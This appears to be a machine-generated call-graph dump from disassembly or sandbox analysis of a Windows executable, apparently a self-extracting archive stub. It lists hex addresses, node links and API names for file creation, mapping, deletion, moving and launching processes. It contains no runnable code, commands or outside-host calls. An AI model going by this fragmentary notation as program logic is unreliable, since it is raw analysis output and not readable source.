23039->23021 23041 ff7a5b RtlFreeHeap 23040->23041 23042 ff7a84 _free 23040->23042 23041->23042 23043 ff7a70 23041->23043 23042->23026 23049 ff7ecc 20 API calls _abort 23043->23049 23045 ff7a76 GetLastError 23045->23042 23046->23025 23047->23031 23049->23045 23051 ff7ac8 23050->23051 23055 ff7a98 _unexpected 23050->23055 23060 ff7ecc 20 API calls _abort 23051->23060 23053 ff7ab3 RtlAllocateHeap 23054 ff7ac6 23053->23054 23053->23055 23054->22940 23055->23051 23055->23053 23059 ff6763 7 API calls 2 library calls 23055->23059 23057->22940 23058->22942 23059->23055 23060->23054 24750 fee1f9 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24779 fe86f9 GetClientRect 24751 ff9df5 FreeLibrary 24712 fff4f4 IsProcessorFeaturePresent 23076 ff98f0 23077 ff98fb 23076->23077 23079 ff9924 23077->23079 23081 ff9920 23077->23081 23082 ff9c02 23077->23082 23089 ff9948 DeleteCriticalSection 23079->23089 23090 ff9990 23082->23090 23085 ff9c47 InitializeCriticalSectionAndSpinCount 23086 ff9c32 23085->23086 23087 fee203 ___delayLoadHelper2@8 5 API calls 23086->23087 23088 ff9c5e 23087->23088 23088->23077 23089->23081 23091 ff99c0 23090->23091 23092 ff99bc 23090->23092 23091->23085 23091->23086 23092->23091 23093 ff99e0 23092->23093 23097 ff9a2c 23092->23097 23093->23091 23095 ff99ec GetProcAddress 23093->23095 23096 ff99fc __crt_fast_encode_pointer 23095->23096 23096->23091 23098 ff9a4d LoadLibraryExW 23097->23098 23099 ff9a42 23097->23099 23100 ff9a6a GetLastError 23098->23100 23101 ff9a82 23098->23101 23099->23092 23100->23101 23102 ff9a75 LoadLibraryExW 23100->23102 23101->23099 23103 ff9a99 FreeLibrary 23101->23103 23102->23101 23103->23099 24812 fe9fee GetDlgItem KiUserCallbackDispatcher ShowWindow SendMessageW 24753 ff29e0 RtlUnwind 24813 fea3e1 102 API calls 24755 ff75d2 8 API calls ___vcrt_uninitialize 24814 fedfd3 46 API calls 5 library calls 23909 fea5d1 23910 fea5db __EH_prolog 23909->23910 24072 fd12d7 23910->24072 23913 fea61d 23916 fea62a 23913->23916 23917 fea693 23913->23917 23973 fea609 23913->23973 23914 feacb2 24148 fec343 23914->24148 23919 fea62f 23916->23919 23926 fea666 23916->23926 23922 fea732 GetDlgItemTextW 23917->23922 23927 fea6ad 23917->23927 23929 fdda42 53 API calls 23919->23929 23919->23973 23920 feacde 23923 feacf8 GetDlgItem SendMessageW 23920->23923 23924 feace7 SendDlgItemMessageW 23920->23924 23921 feacd0 SendMessageW 23921->23920 23925 fea769 23922->23925 23922->23926 24166 fe95f8 GetCurrentDirectoryW 23923->24166 23924->23923 23932 fea781 GetDlgItem 23925->23932 24070 fea772 23925->24070 23931 fea687 EndDialog 23926->23931 23926->23973 23928 fdda42 53 API calls 23927->23928 23933 fea6cf SetDlgItemTextW 23928->23933 23934 fea649 23929->23934 23931->23973 23936 fea7bb SetFocus 23932->23936 23937 fea795 SendMessageW SendMessageW 23932->23937 23939 fea6dd 23933->23939 24188 fd1217 SHGetMalloc 23934->24188 23935 fead2a GetDlgItem 23941 fead49 SetWindowTextW 23935->23941 23942 fead43 23935->23942 23938 fea7cb 23936->23938 23954 fea7d7 23936->23954 23937->23936 23943 fdda42 53 API calls 23938->23943 23948 fea6ea GetMessageW 23939->23948 23939->23973 24167 fe9a32 GetClassNameW 23941->24167 23942->23941 23947 fea7d5 23943->23947 23944 fea650 23949 fea654 SetDlgItemTextW 23944->23949 23944->23973 23945 feac52 23950 fdda42 53 API calls 23945->23950 24082 fec190 23947->24082 23953 fea701 IsDialogMessageW 23948->23953 23948->23973 23949->23973 23955 feac62 SetDlgItemTextW 23950->23955 23953->23939 23957 fea710 TranslateMessage DispatchMessageW 23953->23957 23960 fdda42 53 API calls 23954->23960 23958 feac76 23955->23958 23957->23939 23964 fdda42 53 API calls 23958->23964 23963 fea809 23960->23963 23961 fea82c 24092 fd9d3a 23961->24092 23962 fead94 23967 feadc4 23962->23967 23971 fdda42 53 API calls 23962->23971 23968 fd3e41 _swprintf 51 API calls 23963->23968 23969 feac9f 23964->23969 23966 feb4c7 99 API calls 23966->23962 23978 feb4c7 99 API calls 23967->23978 24008 feae7c 23967->24008 23968->23947 23972 fdda42 53 API calls 23969->23972 23977 feada7 SetDlgItemTextW 23971->23977 23972->23973 23974 feaf2c 23979 feaf3e 23974->23979 23980 feaf35 EnableWindow 23974->23980 23975 fea868 24098 fe9a8d SetCurrentDirectoryW 23975->24098 23976 fea861 GetLastError 23976->23975 23982 fdda42 53 API calls 23977->23982 23983 feaddf 23978->23983 23984 feaf5b 23979->23984 24199 fd1294 GetDlgItem KiUserCallbackDispatcher 23979->24199 23980->23979 23986 feadbb SetDlgItemTextW 23982->23986 23987 feadf1 23983->23987 24009 feae16 23983->24009 23990 feaf82 23984->23990 23999 feaf7a SendMessageW 23984->23999 23985 fea87e 23991 fea891 23985->23991 23992 fea887 GetLastError 23985->23992 23986->23967 24197 fe8fe6 32 API calls 23987->24197 23988 feae6f 23993 feb4c7 99 API calls 23988->23993 23990->23973 23996 fdda42 53 API calls 23990->23996 24000 fea90c 23991->24000 24002 fea8a9 GetTickCount 23991->24002 24003 fea91c 23991->24003 23992->23991 23993->24008 23995 feaf51 24200 fd1294 GetDlgItem KiUserCallbackDispatcher 23995->24200 24004 feaf9b SetDlgItemTextW 23996->24004 23997 feae0a 23997->24009 23999->23990 24000->24003 24005 feab55 24000->24005 24001 feaf0a 24198 fe8fe6 32 API calls 24001->24198 24007 fd3e41 _swprintf 51 API calls 24002->24007 24011 fea934 GetModuleFileNameW 24003->24011 24012 feaaf0 24003->24012 24004->23973 24107 fd12b2 GetDlgItem ShowWindow 24005->24107 24015 fea8c6 24007->24015 24008->23974 24008->24001 24016 fdda42 53 API calls 24008->24016 24009->23988 24017 feb4c7 99 API calls 24009->24017 24189 fde7aa 24011->24189 24012->23926 24020 fdda42 53 API calls 24012->24020 24014 feaf29 24014->23974 24099 fd9528 24015->24099 24016->24008 24021 feae44 24017->24021 24018 feab65 24108 fd12b2 GetDlgItem ShowWindow 24018->24108 24024 feab04 24020->24024 24021->23988 24025 feae4d DialogBoxParamW 24021->24025 24023 fd3e41 _swprintf 51 API calls 24028 fea980 CreateFileMappingW 24023->24028 24029 fd3e41 _swprintf 51 API calls 24024->24029 24025->23926 24025->23988 24026 feab6f 24027 fdda42 53 API calls 24026->24027 24031 feab79 SetDlgItemTextW 24027->24031 24032 feaa5f __vswprintf_c_l 24028->24032 24033 fea9e2 GetCommandLineW 24028->24033 24034 feab22 24029->24034 24109 fd12b2 GetDlgItem ShowWindow 24031->24109 24037 feaa6a ShellExecuteExW 24032->24037 24038 fea9f3 24033->24038 24046 fdda42 53 API calls 24034->24046 24035 fea8ec 24039 fea8fa 24035->24039 24040 fea8f3 GetLastError 24035->24040 24051 feaa87 24037->24051 24193 fea24e SHGetMalloc 24038->24193 24043 fd946e 79 API calls 24039->24043 24040->24039 24041 feab8d SetDlgItemTextW GetDlgItem 24044 feabbe 24041->24044 24045 feaba6 GetWindowLongW SetWindowLongW 24041->24045 24043->24000 24110 feb4c7 24044->24110 24045->24044 24046->23926 24047 feaa0f 24194 fea24e SHGetMalloc 24047->24194 24054 feaa9c WaitForInputIdle 24051->24054 24058 feaaca 24051->24058 24052 feaa1b 24195 fea24e SHGetMalloc 24052->24195 24053 feb4c7 99 API calls 24056 feabda 24053->24056 24057 feaab1 24054->24057 24136 fec6ff 24056->24136 24057->24058 24061 feaab6 Sleep 24057->24061 24058->24012 24062 feaae0 UnmapViewOfFile CloseHandle 24058->24062 24059 feaa27 24063 fde90c 80 API calls 24059->24063 24061->24057 24061->24058 24062->24012 24065 feaa3e MapViewOfFile 24063->24065 24065->24032 24070->23926 24070->23945 24073 fd1339 24072->24073 24074 fd12e0 24072->24074 24202 fdd6e4 GetWindowLongW SetWindowLongW 24073->24202 24075 fd1346 24074->24075 24201 fdd70b 62 API calls 2 library calls 24074->24201 24075->23913 24075->23914 24075->23973 24078 fd1302 24078->24075 24079 fd1315 GetDlgItem 24078->24079 24079->24075 24080 fd1325 24079->24080 24080->24075 24081 fd132b SetWindowTextW 24080->24081 24081->24075 24083 fea388 5 API calls 24082->24083 24084 fec19c GetDlgItem 24083->24084 24085 fec1f1 SendMessageW SendMessageW 24084->24085 24086 fec1c1 24084->24086 24087 fec248 SendMessageW SendMessageW SendMessageW 24085->24087 24088 fec229 24085->24088 24089 fec1cc ShowWindow SendMessageW SendMessageW 24086->24089 24090 fec292 SendMessageW 24087->24090 24091 fec273 SendMessageW 24087->24091 24088->24087 24089->24085 24090->23961 24091->24090 24093 fd9d44 24092->24093 24094 fd9dfe 24093->24094 24095 fd9dd5 24093->24095 24203 fd9ef2 24093->24203 24094->23975 24094->23976 24095->24094 24096 fd9ef2 9 API calls 24095->24096 24096->24094 24098->23985 24100 fd9532 24099->24100 24101 fd959c CreateFileW 24100->24101 24102 fd9590 24100->24102 24101->24102 24103 fdb32c 2 API calls 24102->24103 24104 fd95ee 24102->24104 24105 fd95d5 24103->24105 24104->24035 24105->24104 24106 fd95d9 CreateFileW 24105->24106 24106->24104 24107->24018 24108->24026 24109->24041 24111 feb4d1 __EH_prolog 24110->24111 24112 feabcc 24111->24112 24224 fea156 ExpandEnvironmentStringsW 24111->24224 24112->24053 24116 feb808 SetWindowTextW 24123 feb508 _wcsrchr 24116->24123 24119 ff2b5e 22 API calls 24119->24123 24121 feb5f9 SetFileAttributesW 24124 feb6b4 GetFileAttributesW 24121->24124 24134 feb5ec ___scrt_fastfail 24121->24134 24123->24112 24123->24116 24123->24119 24123->24134 24225 fe1410 CompareStringW 24123->24225 24226 fe95f8 GetCurrentDirectoryW 24123->24226 24227 fda215 7 API calls 24123->24227 24230 fda19e FindClose 24123->24230 24231 fea2ae 76 API calls ___std_exception_copy 24123->24231 24232 fea156 ExpandEnvironmentStringsW 24123->24232 24126 feb6c2 DeleteFileW 24124->24126 24124->24134 24126->24134 24128 feb9d2 GetDlgItem SetWindowTextW SendMessageW 24128->24134 24129 fd3e41 _swprintf 51 API calls 24131 feb6f7 GetFileAttributesW 24129->24131 24130 feba14 SendMessageW 24130->24123 24132 feb708 MoveFileW 24131->24132 24131->24134 24133 feb720 MoveFileExW 24132->24133 24132->24134 24133->24134 24134->24121 24134->24123 24134->24128 24134->24129 24134->24130 24135 feb690 SHFileOperationW 24134->24135 24228 fdb1b7 52 API calls 2 library calls 24134->24228 24229 fda215 7 API calls 24134->24229 24135->24124 24137 fec709 __EH_prolog 24136->24137 24233 fdfb08 76 API calls 24137->24233 24139 fec73a 24234 fd5a9f 76 API calls 24139->24234 24141 fec758 24235 fd7adf 78 API calls 2 library calls 24141->24235 24143 fec79c 24236 fd7c55 24143->24236 24145 fec7ab 24245 fd7b71 84 API calls 24145->24245 24149 fec350 24148->24149 24150 fe952a 6 API calls 24149->24150 24151 fec355 24150->24151 24152 fec35d GetWindow 24151->24152 24153 feacb8 24151->24153 24152->24153 24156 fec379 24152->24156 24153->23920 24153->23921 24154 fec386 GetClassNameW 24689 fe1410 CompareStringW 24154->24689 24156->24153 24156->24154 24157 fec3ae GetWindowLongW 24156->24157 24158 fec40f GetWindow 24156->24158 24157->24158 24159 fec3be SendMessageW 24157->24159 24158->24153 24158->24156 24159->24158 24160 fec3d4 GetObjectW 24159->24160 24690 fe958c GetDC GetDeviceCaps ReleaseDC 24160->24690 24162 fec3e9 24691 fe9549 GetDC GetDeviceCaps ReleaseDC 24162->24691 24692 fe975d 8 API calls ___scrt_fastfail 24162->24692 24165 fec3f9 SendMessageW DeleteObject 24165->24158 24166->23935 24168 fe9a53 24167->24168 24174 fe9a78 24167->24174 24693 fe1410 CompareStringW 24168->24693 24169 fe9a7d SHAutoComplete 24170 fe9a86 24169->24170 24175 fe9eef 24170->24175 24172 fe9a66 24173 fe9a6a FindWindowExW 24172->24173 24172->24174 24173->24174 24174->24169 24174->24170 24176 fe9ef9 __EH_prolog 24175->24176 24177 fd137d 82 API calls 24176->24177 24178 fe9f1b 24177->24178 24694 fd1e9e 24178->24694 24181 fe9f44 24183 fd192e 128 API calls 24181->24183 24182 fe9f35 24184 fd162d 84 API calls 24182->24184 24185 fe9f66 __vswprintf_c_l ___std_exception_copy 24183->24185 24187 fe9f40 24184->24187 24186 fd162d 84 API calls 24185->24186 24186->24187 24187->23962 24187->23966 24188->23944 24190 fde7b3 24189->24190 24192 fde7cc 24189->24192 24191 fde821 80 API calls 24190->24191 24191->24192 24192->24023 24193->24047 24194->24052 24195->24059 24197->23997 24198->24014 24199->23995 24200->23984 24201->24078 24202->24075 24204 fd9eff 24203->24204 24205 fd9f23 24204->24205 24206 fd9f16 CreateDirectoryW 24204->24206 24207 fd9e6b 4 API calls 24205->24207 24206->24205 24208 fd9f56 24206->24208 24209 fd9f29 24207->24209 24212 fd9f65 24208->24212 24216 fda12f 24208->24216 24210 fd9f69 GetLastError 24209->24210 24213 fdb32c 2 API calls 24209->24213 24210->24212 24212->24093 24214 fd9f3f 24213->24214 24214->24210 24215 fd9f43 CreateDirectoryW 24214->24215 24215->24208 24215->24210 24217 fed940 24216->24217 24218 fda13c SetFileAttributesW 24217->24218 24219 fda17f 24218->24219 24220 fda152 24218->24220 24219->24212 24221 fdb32c 2 API calls 24220->24221 24222 fda166 24221->24222 24222->24219 24223 fda16a SetFileAttributesW 24222->24223 24223->24219 24224->24123 24225->24123 24226->24123 24227->24123 24228->24134 24229->24134 24230->24123 24231->24123 24232->24123 24233->24139 24234->24141 24235->24143 24237 fd7c5f 24236->24237 24242 fd7cc9 24237->24242 24268 fda1b1 24237->24268 24239 fd7d7b 24239->24145 24240 fd7d39 24240->24239 24274 fd134c 74 API calls 24240->24274 24242->24240 24244 fda1b1 8 API calls 24242->24244 24246 fd81c4 24242->24246 24244->24242 24247 fd81ce __EH_prolog 24246->24247 24275 fd137d 24247->24275 24249 fd81e9 24283 fd9c0e 24249->24283 24255 fd8218 24406 fd162d 24255->24406 24259 fd8313 24309 fd1e4f 24259->24309 24261 fd8214 24261->24255 24264 fda1b1 8 API calls 24261->24264 24266 fd82b3 24261->24266 24410 fdb782 CompareStringW 24261->24410 24264->24261 24302 fd835c 24266->24302 24267 fd831e 24267->24255 24313 fd391a 24267->24313 24323 fd83c0 24267->24323 24269 fda1c6 24268->24269 24270 fda1ca 24269->24270 24677 fda2df 24269->24677 24270->24237 24272 fda1da 24272->24270 24273 fda1df FindClose 24272->24273 24273->24270 24274->24239 24276 fd1382 __EH_prolog 24275->24276 24411 fdc4ca 24276->24411 24278 fd13b9 24279 fed82c new 8 API calls 24278->24279 24282 fd1412 ___scrt_fastfail 24278->24282 24280 fd13ff 24279->24280 24281 fdad1b 82 API calls 24280->24281 24280->24282 24281->24282 24282->24249 24284 fd9c19 24283->24284 24285 fd81ff 24284->24285 24417 fd6d9a 76 API calls 24284->24417 24285->24255 24287 fd1973 24285->24287 24288 fd197d __EH_prolog 24287->24288 24295 fd19c0 24288->24295 24300 fd19a5 24288->24300 24418 fd6ed7 24288->24418 24290 fd1ae3 24421 fd134c 74 API calls 24290->24421 24292 fd391a 98 API calls 24297 fd1b3a 24292->24297 24293 fd1af3 24293->24292 24293->24300 24294 fd1b7d 24294->24300 24301 fd1bac 24294->24301 24422 fd134c 74 API calls 24294->24422 24295->24290 24295->24293 24295->24300 24297->24294 24298 fd391a 98 API calls 24297->24298 24298->24297 24299 fd391a 98 API calls 24299->24301 24300->24261 24301->24299 24301->24300 24303 fd8369 24302->24303 24440 fe0878 GetSystemTime SystemTimeToFileTime 24303->24440 24305 fd82cd 24305->24259 24306 fe0fbd 24305->24306 24442 fecafe 24306->24442 24310 fd1e54 __EH_prolog 24309->24310 24311 fd1e88 24310->24311 24450 fd192e 24310->24450 24311->24267 24314 fd392a 24313->24314 24315 fd3926 24313->24315 24316 fd3949 24314->24316 24317 fd3957 24314->24317 24315->24267 24318 fd3989 24316->24318 24616 fd30fc 86 API calls 3 library calls 24316->24616 24617 fd2692 98 API calls 3 library calls 24317->24617 24318->24267 24321 fd3955 24321->24318 24618 fd1ef8 74 API calls 24321->24618 24324 fd83ca __EH_prolog 24323->24324 24325 fd8403 24324->24325 24356 fd8407 24324->24356 24642 fe80d0 101 API calls 24324->24642 24326 fd842c 24325->24326 24329 fd84b5 24325->24329 24325->24356 24328 fd844e 24326->24328 24326->24356 24643 fd79a7 153 API calls 24326->24643 24328->24356 24644 fe80d0 101 API calls 24328->24644 24329->24356 24619 fd5c80 24329->24619 24333 fd8540 24333->24356 24627 fd80b1 24333->24627 24335 fd86a7 24337 fda1b1 8 API calls 24335->24337 24338 fd8712 24335->24338 24337->24338 24631 fd7be2 24338->24631 24340 fdc634 80 API calls 24344 fd876d _memcmp 24340->24344 24341 fd889f 24342 fd8972 24341->24342 24349 fd88ee 24341->24349 24347 fd89cd 24342->24347 24360 fd897d 24342->24360 24343 fd8898 24647 fd6bf5 74 API calls 24343->24647 24344->24340 24344->24341 24344->24343 24344->24356 24645 fd807d 83 API calls 24344->24645 24646 fd6bf5 74 API calls 24344->24646 24358 fd895f 24347->24358 24650 fd7f5f 96 API calls 24347->24650 24348 fd89cb 24350 fd946e 79 API calls 24348->24350 24351 fd9e6b 4 API calls 24349->24351 24349->24358 24350->24356 24357 fd8926 24351->24357 24353 fd946e 79 API calls 24353->24356 24354 fd8aa3 24361 fda728 8 API calls 24354->24361 24355 fd8a38 24355->24354 24359 fd9745 GetFileType 24355->24359 24395 fd8ff0 24355->24395 24356->24267 24357->24358 24648 fd919c 96 API calls 24357->24648 24358->24348 24358->24355 24362 fd8a7b 24359->24362 24360->24348 24649 fd7d9b 100 API calls pre_c_initialization 24360->24649 24364 fd8af2 24361->24364 24362->24354 24651 fd6bf5 74 API calls 24362->24651 24366 fda728 8 API calls 24364->24366 24367 fd8b08 24366->24367 24371 fd8bcb 24367->24371 24653 fd98d5 SetFilePointer GetLastError SetEndOfFile 24367->24653 24369 fd8a91 24652 fd6e9b 75 API calls 24369->24652 24372 fd8d2c 24371->24372 24373 fd8c26 24371->24373 24375 fd8d3e 24372->24375 24376 fd8d52 24372->24376 24393 fd8c56 24372->24393 24374 fd8c98 24373->24374 24378 fd8c36 24373->24378 24377 fd80b1 CharUpperW 24374->24377 24381 fd910b 123 API calls 24375->24381 24382 fe2842 75 API calls 24376->24382 24379 fd8cb3 24377->24379 24380 fd8c7c 24378->24380 24385 fd8c44 24378->24385 24388 fd8cdc 24379->24388 24389 fd8ce3 24379->24389 24379->24393 24380->24393 24655 fd774c 108 API calls 24380->24655 24381->24393 24384 fd8d6b 24382->24384 24386 fe24d9 123 API calls 24384->24386 24654 fd6bf5 74 API calls 24385->24654 24386->24393 24656 fd74dd 84 API calls pre_c_initialization 24388->24656 24657 fd9049 94 API calls __EH_prolog 24389->24657 24398 fd8e7a 24393->24398 24658 fd6bf5 74 API calls 24393->24658 24395->24353 24396 fd8f33 24637 fd9a7e 24396->24637 24397 fda12f 4 API calls 24399 fd8fe0 24397->24399 24398->24395 24398->24396 24405 fd8f85 24398->24405 24659 fd9bd6 SetEndOfFile 24398->24659 24399->24395 24660 fd6bf5 74 API calls 24399->24660 24402 fd8f7a 24403 fd94da 75 API calls 24402->24403 24403->24405 24405->24395 24405->24397 24407 fd163f 24406->24407 24676 fdc56d 84 API calls 24407->24676 24410->24261 24412 fdc4d4 __EH_prolog 24411->24412 24413 fed82c new 8 API calls 24412->24413 24414 fdc517 24413->24414 24415 fed82c new 8 API calls 24414->24415 24416 fdc53b 24415->24416 24416->24278 24417->24285 24423 fd16c0 24418->24423 24420 fd6ef3 24420->24295 24421->24300 24422->24301 24424 fd16d6 24423->24424 24435 fd172e __vswprintf_c_l 24423->24435 24425 fd16ff 24424->24425 24436 fd6cce 74 API calls __vswprintf_c_l 24424->24436 24427 fd1755 24425->24427 24432 fd171b ___std_exception_copy 24425->24432 24429 ff2b5e 22 API calls 24427->24429 24428 fd16f5 24437 fd6d3a 75 API calls 24428->24437 24431 fd175c 24429->24431 24431->24435 24439 fd6d3a 75 API calls 24431->24439 24432->24435 24438 fd6d3a 75 API calls 24432->24438 24435->24420 24436->24428 24437->24425 24438->24435 24439->24435 24441 fe08a8 __vswprintf_c_l 24440->24441 24441->24305 24443 fecb0b 24442->24443 24444 fdda42 53 API calls 24443->24444 24445 fecb2e 24444->24445 24446 fd3e41 _swprintf 51 API calls 24445->24446 24447 fecb40 24446->24447 24448 fec190 16 API calls 24447->24448 24449 fe0fd6 24448->24449 24449->24259 24451 fd1943 24450->24451 24453 fd193f 24450->24453 24454 fd1884 24451->24454 24453->24311 24455 fd1892 24454->24455 24457 fd18c7 24454->24457 24456 fd391a 98 API calls 24455->24456 24460 fd18aa 24456->24460 24462 fd3d4f 24457->24462 24460->24453 24464 fd3d58 24462->24464 24463 fd391a 98 API calls 24463->24464 24464->24463 24466 fd18e3 24464->24466 24479 fe02e8 24464->24479 24466->24460 24467 fd1d61 24466->24467 24468 fd1d6b __EH_prolog 24467->24468 24487 fd399d 24468->24487 24470 fd1d95 24471 fd1e1c 24470->24471 24472 fd16c0 76 API calls 24470->24472 24471->24460 24473 fd1dac 24472->24473 24515 fd1837 76 API calls 24473->24515 24475 fd1dc4 24477 fd1dd0 24475->24477 24516 fe0fde MultiByteToWideChar 24475->24516 24517 fd1837 76 API calls 24477->24517 24480 fe02ef 24479->24480 24481 fe030a 24480->24481 24485 fd6cc9 RaiseException FindHandler 24480->24485 24482 fe031b SetThreadExecutionState 24481->24482 24486 fd6cc9 RaiseException FindHandler 24481->24486 24482->24464 24485->24481 24486->24482 24488 fd39a7 __EH_prolog 24487->24488 24489 fd39bd 24488->24489 24490 fd39d9 24488->24490 24552 fd134c 74 API calls 24489->24552 24491 fd3c22 24490->24491 24495 fd3a05 24490->24495 24571 fd134c 74 API calls 24491->24571 24494 fd39c8 24494->24470 24495->24494 24518 fe2842 24495->24518 24497 fd3a86 24498 fd3b11 24497->24498 24514 fd3a7d 24497->24514 24555 fdc634 24497->24555 24531 fda728 24498->24531 24499 fd3a82 24499->24497 24554 fd1ede 76 API calls 24499->24554 24501 fd3a54 24501->24497 24501->24499 24502 fd3a72 24501->24502 24553 fd134c 74 API calls 24502->24553 24507 fd3b24 24508 fd3b9e 24507->24508 24509 fd3ba8 24507->24509 24535 fd910b 24508->24535 24561 fe24d9 24509->24561 24512 fd3ba6 24512->24514 24570 fd6bf5 74 API calls 24512->24570 24546 fe16cb 24514->24546 24515->24475 24516->24477 24517->24471 24519 fe2851 24518->24519 24521 fe285b 24518->24521 24572 fd6d3a 75 API calls 24519->24572 24522 fe289b 24521->24522 24523 fe28a0 ___std_exception_copy 24521->24523 24530 fe28f9 ___scrt_fastfail 24521->24530 24574 ff0b4a RaiseException 24522->24574 24524 fe29b0 24523->24524 24526 fe28d5 24523->24526 24523->24530 24575 ff0b4a RaiseException 24524->24575 24573 fe2763 75 API calls 3 library calls 24526->24573 24528 fe29d3 24530->24501 24532 fda735 24531->24532 24534 fda73f 24531->24534 24533 fed82c new 8 API calls 24532->24533 24533->24534 24534->24507 24536 fd9115 __EH_prolog 24535->24536 24576 fd7c3c 24536->24576 24539 fd6ed7 76 API calls 24540 fd9127 24539->24540 24579 fdc70f 24540->24579 24542 fd9181 24542->24512 24544 fdc70f 116 API calls 24545 fd9139 24544->24545 24545->24542 24545->24544 24588 fdc8c7 97 API calls __vswprintf_c_l 24545->24588 24548 fe16d5 24546->24548 24547 fe16ee 24589 fe03c7 84 API calls 24547->24589 24548->24547 24551 fe1702 24548->24551 24550 fe16f5 24550->24551 24552->24494 24553->24514 24554->24497 24556 fdc655 24555->24556 24557 fdc667 24555->24557 24590 fd607d 24556->24590 24559 fd607d 80 API calls 24557->24559 24560 fdc65f 24559->24560 24560->24498 24562 fe24e2 24561->24562 24564 fe250b 24561->24564 24563 fe24ff 24562->24563 24566 fe2501 24562->24566 24568 fe24f7 24562->24568 24563->24512 24564->24563 24615 fe4b06 123 API calls 2 library calls 24564->24615 24614 fe581e 116 API calls 24566->24614 24601 fe626d 24568->24601 24570->24514 24571->24494 24572->24521 24573->24530 24574->24524 24575->24528 24577 fda995 GetVersionExW 24576->24577 24578 fd7c41 24577->24578 24578->24539 24582 fdc724 __vswprintf_c_l 24579->24582 24580 fdc86e 24581 fdc896 24580->24581 24583 fdc6ae 6 API calls 24580->24583 24584 fe02e8 SetThreadExecutionState RaiseException 24581->24584 24582->24580 24585 fdc865 24582->24585 24586 fe80d0 101 API calls 24582->24586 24587 fda810 89 API calls 24582->24587 24583->24581 24584->24585 24585->24545 24586->24582 24587->24582 24588->24545 24589->24550 24591 fd609c 24590->24591 24600 fd6118 24590->24600 24592 fde7aa 80 API calls 24591->24592 24591->24600 24593 fd60c4 24592->24593 24594 fe11fa WideCharToMultiByte 24593->24594 24595 fd60d7 24594->24595 24596 fd60dc 24595->24596 24597 fd611a 24595->24597 24599 fd644c 80 API calls 24596->24599 24596->24600 24598 fd6165 80 API calls 24597->24598 24598->24600 24599->24600 24600->24560 24602 fe2a7f 75 API calls 24601->24602 24608 fe627e ___BuildCatchObject __vswprintf_c_l 24602->24608 24603 fdc70f 116 API calls 24603->24608 24604 fe6650 24605 fe47da 98 API calls 24604->24605 24606 fe6660 __vswprintf_c_l 24605->24606 24606->24563 24607 fe0697 79 API calls 24607->24608 24608->24603 24608->24604 24608->24607 24609 fe33d3 116 API calls 24608->24609 24610 fe66a2 116 API calls 24608->24610 24611 fe045d 86 API calls 24608->24611 24612 fe6cdb 123 API calls 24608->24612 24613 fe2e2c 98 API calls 24608->24613 24609->24608 24610->24608 24611->24608 24612->24608 24613->24608 24614->24563 24615->24563 24616->24321 24617->24321 24618->24318 24620 fd5c8e 24619->24620 24661 fd5bad 24620->24661 24622 fd5cc1 24623 fd5cf9 24622->24623 24625 fd5d02 24622->24625 24666 fdaa05 CompareStringW CharUpperW CompareStringW 24622->24666 24623->24333 24625->24623 24667 fdfa84 CompareStringW 24625->24667 24628 fd80cf 24627->24628 24673 fe1401 CharUpperW 24628->24673 24630 fd8179 24630->24335 24632 fd7bf1 24631->24632 24633 fd7c31 24632->24633 24674 fd6e7d 74 API calls 24632->24674 24633->24344 24635 fd7c29 24675 fd134c 74 API calls 24635->24675 24638 fd9a8f 24637->24638 24641 fd9a9e 24637->24641 24639 fd9a95 FlushFileBuffers 24638->24639 24638->24641 24639->24641 24640 fd9b17 SetFileTime 24640->24402 24641->24640 24642->24325 24643->24328 24644->24356 24645->24344 24646->24344 24647->24341 24648->24358 24649->24348 24650->24358 24651->24369 24652->24354 24653->24371 24654->24393 24655->24393 24656->24393 24657->24393 24658->24398 24659->24396 24660->24395 24668 fd5aaa 24661->24668 24664 fd5bce 24664->24622 24665 fd5aaa 3 API calls 24665->24664 24666->24622 24667->24623 24671 fd5ab4 24668->24671 24669 fd5b9c 24669->24664 24669->24665 24671->24669 24672 fdaa05 CompareStringW CharUpperW CompareStringW 24671->24672 24672->24671 24673->24630 24674->24635 24675->24633 24678 fda2e9 24677->24678 24679 fda379 FindNextFileW 24678->24679 24680 fda307 FindFirstFileW 24678->24680 24682 fda398 24679->24682 24683 fda384 GetLastError 24679->24683 24681 fda320 24680->24681 24688 fda35d 24680->24688 24684 fdb32c 2 API calls 24681->24684 24682->24688 24683->24682 24685 fda339 24684->24685 24686 fda33d FindFirstFileW 24685->24686 24687 fda352 GetLastError 24685->24687 24686->24687 24686->24688 24687->24688 24688->24272 24689->24156 24690->24162 24691->24162 24692->24165 24693->24172 24695 fd9c0e 76 API calls 24694->24695 24696 fd1eaa 24695->24696 24697 fd1eae 24696->24697 24698 fd1973 98 API calls 24696->24698 24697->24181 24697->24182 24699 fd1ebb 24698->24699 24699->24697 24701 fd134c 74 API calls 24699->24701 24701->24697 24815 fe93cd GdipDisposeImage GdipFree pre_c_initialization 24756 fee1ca 28 API calls 2 library calls 24817 fe9fc9 78 API calls 24757 ff91c2 71 API calls _free 24758 ff25c0 5 API calls 2 library calls 22868 fed7bf 22869 fed7c9 22868->22869 22870 fed53a ___delayLoadHelper2@8 19 API calls 22869->22870 22871 fed7d6 22870->22871 24720 fd94b8 79 API calls 24818 feafb9 93 API calls _swprintf 24760 fee1b6 20 API calls 24819 ff93b7 31 API calls 2 library calls 24761 ffa139 27 API calls ___delayLoadHelper2@8 24723 fea0b0 97 API calls 24725 fe6cac 116 API calls 24791 fec2a7 70 API calls 23106 fed1a4 19 API calls ___delayLoadHelper2@8 24727 ffaca1 GetProcessHeap 24728 fe589e 123 API calls __vswprintf_c_l 24793 fd169e 84 API calls 23209 fee091 23210 fee09d ___DestructExceptionObject 23209->23210 23235 fedba6 23210->23235 23212 fee0a4 23214 fee0cd 23212->23214 23315 fee4f5 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 23212->23315 23219 fee10c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23214->23219 23246 ff77c5 23214->23246 23218 fee0ec ___DestructExceptionObject 23226 fee16c 23219->23226 23316 ff67f9 38 API calls 3 library calls 23219->23316 23254 fee610 23226->23254 23230 fee198 23232 fee1a1 23230->23232 23317 ff6c00 28 API calls _abort 23230->23317 23318 fedd1d 13 API calls 2 library calls 23232->23318 23236 fedbaf 23235->23236 23319 fee34b IsProcessorFeaturePresent 23236->23319 23238 fedbbb 23320 ff15e6 23238->23320 23240 fedbc0 23241 fedbc4 23240->23241 23329 ff7652 23240->23329 23241->23212 23244 fedbdb 23244->23212 23248 ff77dc 23246->23248 23247 fee203 